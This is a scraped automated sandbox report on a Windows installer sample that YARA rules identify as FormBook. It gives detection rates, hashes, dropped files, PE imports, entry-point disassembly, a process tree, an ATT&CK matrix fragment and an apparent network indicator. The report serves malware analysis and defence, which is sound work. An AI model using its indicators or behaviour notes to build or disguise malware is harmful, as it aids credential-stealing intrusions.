        Path Interception1
        Access Token Manipulation
        1
        Access Token Manipulation
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts1
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        11
        Process Injection
        LSASS Memory13
        Security Software Discovery
        Remote Desktop Protocol1
        Clipboard Data
        Exfiltration Over Bluetooth1
        Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Software Packing
        NTDS14
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe41%VirustotalBrowse
        SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe34%ReversingLabsWin32.Trojan.Nsisx
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\miylwnpd.exe20%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\miylwnpd.exe24%ReversingLabsWin32.Trojan.Midie
        SourceDetectionScannerLabelLinkDownload
        1.2.miylwnpd.exe.2cb0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        www.beamaster.info/p0ip/0%Avira URL Cloudsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        www.beamaster.info/p0ip/true
        • Avira URL Cloud: safe
        low
        NameSourceMaliciousAntivirus DetectionReputation
        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exefalse
          high
          No contacted IP infos
          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:626424
          Start date and time: 14/05/202200:37:342022-05-14 00:37:34 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 54s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207 (renamed file extension from 17207 to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal84.troj.winEXE@5/4@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 99.8% (good quality ratio 94.3%)
          • Quality average: 83.4%
          • Quality standard deviation: 27.2%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 31
          • Number of non-executed functions: 35
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 23.211.6.115
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
          No simulations
          No context
          No context
          No context
          No context
          No context
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):80384
          Entropy (8bit):6.294028811173466
          Encrypted:false
          SSDEEP:1536:XsTaC+v1CUfr0oxAomP3cX/4pi2sWjcdjXI:ua5wUD1/ui5j4
          MD5:FF4C2F4D6E1FA34E8B958993C0DE134D
          SHA1:8E8DE477AD67E1B107396B8B9BE749363EF10640
          SHA-256:38DD484E87FBD4520A99EAD1FDC0010F45A3D5F8A22B1BBD01E3FCBD56104AB3
          SHA-512:D64482AB140944CF138E47914EFD3EE2362E0FE98D519A89EAE6D31E03E9C51BFCBB4D44BA634526F393613F0AD8C14971BA240DBF2560BC57FF1C3705967F36
          Malicious:true
          Antivirus:
          • Antivirus: Virustotal, Detection: 20%, Browse
          • Antivirus: ReversingLabs, Detection: 24%
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L.....~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
          File Type:data
          Category:dropped
          Size (bytes):274424
          Entropy (8bit):7.537223383847658
          Encrypted:false
          SSDEEP:3072:5vonGilTM+lGDSQ7923iyT+7EqtxRuNfpzqk2POHpfA6zIya5wUD1/ui5j4:5von9M+0eQ79IoTtcC6fA6zmwQu
          MD5:0A075A0200A53ACFD831038EC6C896F1
          SHA1:07E7D01FA876F8A37EE6FE1FAA34BA6C97A8E402
          SHA-256:DF91BE25213DA8243E34DCCBE3017FD53F9F493DD516D9D55263501375BA4122
          SHA-512:F43698C1374F37CD9F2F64866E611A8F0E98CE0107094AD1AB2AE1158E9993DE5586B4F8A8869414805C80DC88E40B9791172D9CC8CAC36DC1E34DB03E5F8445
          Malicious:false
          Reputation:low
          Preview:.3......,...................h...T%.......2.......3..........................................................................................................................................................................................................................................G...................j...............................................................................................................................^.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
          File Type:data
          Category:dropped
          Size (bytes):175615
          Entropy (8bit):7.990059953409327
          Encrypted:true
          SSDEEP:3072:2vonGilTM+lGDSQ7923iyT+7EqtxRuNfpzqk2POHpfA6zY:2von9M+0eQ79IoTtcC6fA6zY
          MD5:6EB3509F6E43EEA8950ADBC156A96248
          SHA1:019A49C79CFB4503F005BA4347FD5EBF8C99718E
          SHA-256:F203F8DB5CFD1E17D03DD57BA2766F15F2A189E80080089C673BED271C87CDB7
          SHA-512:95F99448679A60B2707DE05E3D348CFB4F6E4112E2780ED53CC6E540C7493A0169316EBEAF992274D4474B8F36FEA5357CD2794AD8AA77CC6FEC2C48CC892CD9
          Malicious:false
          Reputation:low
          Preview:...PH....[!...X............#....._=.Be...>.....i.`..n.......%.m.8..$./L.+..S..9.1.64.%....W5..,.?....Cj/..f.1}8.....)i..5B\.......i...Ym....V.32Ay.+8y.-.............].U.v..:...m.0.......E}.7j....q9......Y..G.}....Z..N.........{!........O.O.0.....a%|x....^H....x.".1".'q...<.....=.Xe...>......i.`..n........,....c...74..=rlp.....{.9..GZ.^.........HX.7Ab.%.V.)i..5B<..E...].....6..$........0...@...>..a,./_....n.M:f=.:.....0..S....E..7j...oq......h.OG.}....Z...../......{!W.......O.........a,|x....G..Z.x."..".5'q......._=.Be...>.....i.`..n........,....c...74..=rlp.....{.9..GZ.^.........HX.7Ab.%.V.)i..5B<..E...].....6..$........0...@...>..a,./_....n.U.v..:...P.0."S....E}.7j...oq.........G.}....Z...../......{!W.......O.........a,|x....G..Z.x."..".5'q......._=.Be...>.....i.`..n........,....c...74..=rlp.....{.9..GZ.^.........HX.7Ab.%.V.)i..5B<..E...].....6..$........0...@...>..a,./_....n.U.v..:...P.0."S....E}.7j...oq.........G.}....Z...../..
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
          File Type:data
          Category:dropped
          Size (bytes):5171
          Entropy (8bit):6.118274194888097
          Encrypted:false
          SSDEEP:96:BXrtcxDxcjguWPxAcgUAyF1DQHWF3yW5SSn/MLmyJo3XFWDNbxUuyFxFV04mxkzq:2WguW5TAquH8cSn/MLmyJo3XFWZAFnRw
          MD5:ACB8234D1D848397EC3B1EB59A25AC91
          SHA1:7D17F048DDC6D19A40898B6079D36E0E1BDAB195
          SHA-256:942BD175D04B7C5567EB7F3EABC39866736B8922C68539D16DA9A32A839B5820
          SHA-512:601CA88B29149B9DDADECF29BBBBAAE1B626B84AE8C7BD580EB7BDF64FB3CDC9CD20563EFAEA229640194CE27684024EA62C8DE148E81CC045C40E9AFCB77459
          Malicious:false
          Reputation:low
          Preview:..%...........].".M."..m".M."...u.J.qE.....Y.r.!r....u..v.....U..Qr.!r....u..k.....=..9r.!r....u..<.....e..ar.!r....u........M..I.....7.%..M...!...m..i.......d.......q..L.?...Z\....q..O..q....Y.i].........)(fF.qr.U.r.=.r.e..r.M..r.m.r...[....!Z...Y-....]r.U...%"(..]..q.....J.).......) f..Y...]...dO!.....".M."..u..%..6.!.-..%.......L..L...u..q..%....%....u..qdO!...wK..........O....rR..........O%.. ...........O%.....E".M."..J.u......U..q..u.....qK....q..q..u..u.i..(...M...%..%..d... U.. Q...%.Ll... U.. Q...%..M...(U...rR.f.....?prr..Y."..r.%..rrr..Y..Y.....]...J.]......]dO.......".M."..J.uE.....M..q..u.....qK....q..q..u..u.i......M".......%..%..d... M.. I..!..%.Ll... M.. I.....%.<l.. M.. I....d.%..?....M...I...%.Ll... M.. I.(.%..M...(M...wK.o......qrr..Y.....%........r..r..r..r.!r.%.4srr..Y..Y.....]...J.]......]dO.......J.u......i..q..u.....qK....q..q..u..u.i......M...%..%..d... i.. ...!..%.Ll... i.. ....%..M...(i.. ..H.....Aqrr..Y.#r.!r.%..pr
          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Entropy (8bit):7.333983439825163
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
          File size:428316
          MD5:14848f52302c15e27b26fee5fada11c1
          SHA1:04d62d915bd1a81c4b5ed35df6edb953107398c8
          SHA256:4ac982ea35522a13de30ff7ddbbec9becf2c7528a48f0aff377e3d6758a7ae7b
          SHA512:aee08da4569bc969db4c086cb89950e311aaab9bf94677d9ba532b256ed5a29cc5942d48ca7c58ec8bee095d8e84b1f91935d61a9c601e1f9950c93a4ddd99c3
          SSDEEP:6144:eOtIldxqG7hiusCwlvcyHQOEYf5iTQuuAxjNnmJvLtVeV+hLk7:eORQiuqEyHH1GtNnmFBi+lg
          TLSH:B694E092D5C041A5EC794B34B53B1D3A16A7FFB9BCF9EA8E864D71312B732C2401B942
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....
          Icon Hash:81090f232b232380
          Entrypoint:0x403646
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:61259b55b8912888e90f516ca08dc514
          Instruction
          push ebp
          mov ebp, esp
          sub esp, 000003F4h
          push ebx
          push esi
          push edi
          push 00000020h
          pop edi
          xor ebx, ebx
          push 00008001h
          mov dword ptr [ebp-14h], ebx
          mov dword ptr [ebp-04h], 0040A230h
          mov dword ptr [ebp-10h], ebx
          call dword ptr [004080C8h]
          mov esi, dword ptr [004080CCh]
          lea eax, dword ptr [ebp-00000140h]
          push eax
          mov dword ptr [ebp-0000012Ch], ebx
          mov dword ptr [ebp-2Ch], ebx
          mov dword ptr [ebp-28h], ebx
          mov dword ptr [ebp-00000140h], 0000011Ch
          call esi
          test eax, eax
          jne 00007F16FCE2A37Ah
          lea eax, dword ptr [ebp-00000140h]
          mov dword ptr [ebp-00000140h], 00000114h
          push eax
          call esi
          mov ax, word ptr [ebp-0000012Ch]
          mov ecx, dword ptr [ebp-00000112h]
          sub ax, 00000053h
          add ecx, FFFFFFD0h
          neg ax
          sbb eax, eax
          mov byte ptr [ebp-26h], 00000004h
          not eax
          and eax, ecx
          mov word ptr [ebp-2Ch], ax
          cmp dword ptr [ebp-0000013Ch], 0Ah
          jnc 00007F16FCE2A34Ah
          and word ptr [ebp-00000132h], 0000h
          mov eax, dword ptr [ebp-00000134h]
          movzx ecx, byte ptr [ebp-00000138h]
          mov dword ptr [007A8B58h], eax
          xor eax, eax
          mov ah, byte ptr [ebp-0000013Ch]
          movzx eax, ax
          or eax, ecx
          xor ecx, ecx
          mov ch, byte ptr [ebp-2Ch]
          movzx ecx, cx
          shl eax, 10h
          or eax, ecx
          Programming Language:
          • [EXP] VC++ 6.0 SP5 build 8804
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000x28ee8.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc0x3b90000x28ee80x29000False0.555979658918data5.77947429109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountry
          RT_ICON0x3b92800x10828dataEnglishUnited States
          RT_ICON0x3c9aa80x1013cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
          RT_ICON0x3d9be80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294901499, next used block 4294901499EnglishUnited States
          RT_ICON0x3dde100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294901501, next used block 4294901757EnglishUnited States
          RT_ICON0x3e03b80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294967294, next used block 4294967294EnglishUnited States
          RT_ICON0x3e14600x468GLS_BINARY_LSB_FIRSTEnglishUnited States
          RT_DIALOG0x3e18c80x100dataEnglishUnited States
          RT_DIALOG0x3e19c80x11cdataEnglishUnited States
          RT_DIALOG0x3e1ae80x60dataEnglishUnited States
          RT_GROUP_ICON0x3e1b480x5adataEnglishUnited States
          RT_MANIFEST0x3e1ba80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
          DLLImport
          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States
          No network behavior found

          Click to jump to process

          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:00:38:34
          Start date:14/05/2022
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe"
          Imagebase:0x400000
          File size:428316 bytes
          MD5 hash:14848F52302C15E27B26FEE5FADA11C1
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Target ID:1
          Start time:00:38:36
          Start date:14/05/2022
          Path:C:\Users\user\AppData\Local\Temp\miylwnpd.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
          Imagebase:0x2e0000
          File size:80384 bytes
          MD5 hash:FF4C2F4D6E1FA34E8B958993C0DE134D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Antivirus matches:
          • Detection: 20%, Virustotal, Browse
          • Detection: 24%, ReversingLabs
          Reputation:low

          Target ID:2
          Start time:00:38:37
          Start date:14/05/2022
          Path:C:\Users\user\AppData\Local\Temp\miylwnpd.exe
          Wow64 process (32bit):
          Commandline:C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
          Imagebase:
          File size:80384 bytes
          MD5 hash:FF4C2F4D6E1FA34E8B958993C0DE134D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Reset < >

            Execution Graph

            Execution Coverage:16.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:16.3%
            Total number of Nodes:1372
            Total number of Limit Nodes:22
            execution_graph 3057 401941 3058 401943 3057->3058 3063 402da6 3058->3063 3064 402db2 3063->3064 3105 4066ab 3064->3105 3067 401948 3069 405d7a 3067->3069 3147 406045 3069->3147 3072 405da2 DeleteFileW 3102 401951 3072->3102 3073 405db9 3075 405ed9 3073->3075 3161 40666e lstrcpynW 3073->3161 3075->3102 3190 4069a4 FindFirstFileW 3075->3190 3076 405ddf 3077 405df2 3076->3077 3078 405de5 lstrcatW 3076->3078 3162 405f89 lstrlenW 3077->3162 3079 405df8 3078->3079 3082 405e08 lstrcatW 3079->3082 3084 405e13 lstrlenW FindFirstFileW 3079->3084 3082->3084 3084->3075 3085 405e35 3084->3085 3088 405ebc FindNextFileW 3085->3088 3098 405d7a 60 API calls 3085->3098 3101 4056d0 24 API calls 3085->3101 3166 40666e lstrcpynW 3085->3166 3167 405d32 3085->3167 3175 4056d0 3085->3175 3186 40642e MoveFileExW 3085->3186 3088->3085 3091 405ed2 FindClose 3088->3091 3089 405d32 5 API calls 3092 405f14 3089->3092 3091->3075 3093 405f18 3092->3093 3094 405f2e 3092->3094 3097 4056d0 24 API calls 3093->3097 3093->3102 3096 4056d0 24 API calls 3094->3096 3096->3102 3099 405f25 3097->3099 3098->3085 3100 40642e 36 API calls 3099->3100 3100->3102 3101->3088 3107 4066b8 3105->3107 3106 4068db 3108 402dd3 3106->3108 3138 40666e lstrcpynW 3106->3138 3107->3106 3110 4068a9 lstrlenW 3107->3110 3113 4066ab 10 API calls 3107->3113 3114 4067c0 GetSystemDirectoryW 3107->3114 3116 4067d3 GetWindowsDirectoryW 3107->3116 3117 40684a lstrcatW 3107->3117 3118 4066ab 10 API calls 3107->3118 3119 4068f5 5 API calls 3107->3119 3120 406802 SHGetSpecialFolderLocation 3107->3120 3131 40653c 3107->3131 3136 4065b5 wsprintfW 3107->3136 3137 40666e lstrcpynW 3107->3137 3108->3067 3122 4068f5 3108->3122 3110->3107 3113->3110 3114->3107 3116->3107 3117->3107 3118->3107 3119->3107 3120->3107 3121 40681a SHGetPathFromIDListW CoTaskMemFree 3120->3121 3121->3107 3128 406902 3122->3128 3123 40697d CharPrevW 3124 406978 3123->3124 3124->3123 3126 40699e 3124->3126 3125 40696b CharNextW 3125->3124 3125->3128 3126->3067 3128->3124 3128->3125 3129 406957 CharNextW 3128->3129 3130 406966 CharNextW 3128->3130 3143 405f6a 3128->3143 3129->3128 3130->3125 3139 4064db 3131->3139 3134 406570 RegQueryValueExW RegCloseKey 3135 4065a0 3134->3135 3135->3107 3136->3107 3137->3107 3138->3108 3140 4064ea 3139->3140 3141 4064f3 RegOpenKeyExW 3140->3141 3142 4064ee 3140->3142 3141->3142 3142->3134 3142->3135 3144 405f70 3143->3144 3145 405f86 3144->3145 3146 405f77 CharNextW 3144->3146 3145->3128 3146->3144 3196 40666e lstrcpynW 3147->3196 3149 406056 3197 405fe8 CharNextW CharNextW 3149->3197 3152 405d9a 3152->3072 3152->3073 3153 4068f5 5 API calls 3159 40606c 3153->3159 3154 40609d lstrlenW 3155 4060a8 3154->3155 3154->3159 3156 405f3d 3 API calls 3155->3156 3158 4060ad GetFileAttributesW 3156->3158 3157 4069a4 2 API calls 3157->3159 3158->3152 3159->3152 3159->3154 3159->3157 3160 405f89 2 API calls 3159->3160 3160->3154 3161->3076 3163 405f97 3162->3163 3164 405fa9 3163->3164 3165 405f9d CharPrevW 3163->3165 3164->3079 3165->3163 3165->3164 3166->3085 3203 406139 GetFileAttributesW 3167->3203 3170 405d5f 3170->3085 3171 405d55 DeleteFileW 3173 405d5b 3171->3173 3172 405d4d RemoveDirectoryW 3172->3173 3173->3170 3174 405d6b SetFileAttributesW 3173->3174 3174->3170 3176 40578d 3175->3176 3178 4056eb 3175->3178 3176->3085 3177 405707 lstrlenW 3180 405730 3177->3180 3181 405715 lstrlenW 3177->3181 3178->3177 3179 4066ab 17 API calls 3178->3179 3179->3177 3183 405743 3180->3183 3184 405736 SetWindowTextW 3180->3184 3181->3176 3182 405727 lstrcatW 3181->3182 3182->3180 3183->3176 3185 405749 SendMessageW SendMessageW SendMessageW 3183->3185 3184->3183 3185->3176 3187 406442 3186->3187 3189 40644f 3186->3189 3206 4062b4 3187->3206 3189->3085 3191 405efe 3190->3191 3192 4069ba FindClose 3190->3192 3191->3102 3193 405f3d lstrlenW CharPrevW 3191->3193 3192->3191 3194 405f08 3193->3194 3195 405f59 lstrcatW 3193->3195 3194->3089 3195->3194 3196->3149 3198 406005 3197->3198 3200 406017 3197->3200 3199 406012 CharNextW 3198->3199 3198->3200 3202 40603b 3199->3202 3201 405f6a CharNextW 3200->3201 3200->3202 3201->3200 3202->3152 3202->3153 3204 405d3e 3203->3204 3205 40614b SetFileAttributesW 3203->3205 3204->3170 3204->3171 3204->3172 3205->3204 3207 4062e4 3206->3207 3208 40630a GetShortPathNameW 3206->3208 3233 40615e GetFileAttributesW CreateFileW 3207->3233 3210 406429 3208->3210 3211 40631f 3208->3211 3210->3189 3211->3210 3213 406327 wsprintfA 3211->3213 3212 4062ee CloseHandle GetShortPathNameW 3212->3210 3214 406302 3212->3214 3215 4066ab 17 API calls 3213->3215 3214->3208 3214->3210 3216 40634f 3215->3216 3234 40615e GetFileAttributesW CreateFileW 3216->3234 3218 40635c 3218->3210 3219 40636b GetFileSize GlobalAlloc 3218->3219 3220 406422 CloseHandle 3219->3220 3221 40638d 3219->3221 3220->3210 3235 4061e1 ReadFile 3221->3235 3226 4063c0 3228 4060c3 4 API calls 3226->3228 3227 4063ac lstrcpyA 3229 4063ce 3227->3229 3228->3229 3230 406405 SetFilePointer 3229->3230 3242 406210 WriteFile 3230->3242 3233->3212 3234->3218 3236 4061ff 3235->3236 3236->3220 3237 4060c3 lstrlenA 3236->3237 3238 406104 lstrlenA 3237->3238 3239 40610c 3238->3239 3240 4060dd lstrcmpiA 3238->3240 3239->3226 3239->3227 3240->3239 3241 4060fb CharNextA 3240->3241 3241->3238 3243 40622e GlobalFree 3242->3243 3243->3220 3244 4015c1 3245 402da6 17 API calls 3244->3245 3246 4015c8 3245->3246 3247 405fe8 4 API calls 3246->3247 3259 4015d1 3247->3259 3248 401631 3250 401663 3248->3250 3251 401636 3248->3251 3249 405f6a CharNextW 3249->3259 3253 401423 24 API calls 3250->3253 3271 401423 3251->3271 3261 40165b 3253->3261 3258 40164a SetCurrentDirectoryW 3258->3261 3259->3248 3259->3249 3260 401617 GetFileAttributesW 3259->3260 3263 405c39 3259->3263 3266 405b9f CreateDirectoryW 3259->3266 3275 405c1c CreateDirectoryW 3259->3275 3260->3259 3278 406a3b GetModuleHandleA 3263->3278 3267 405bf0 GetLastError 3266->3267 3268 405bec 3266->3268 3267->3268 3269 405bff SetFileSecurityW 3267->3269 3268->3259 3269->3268 3270 405c15 GetLastError 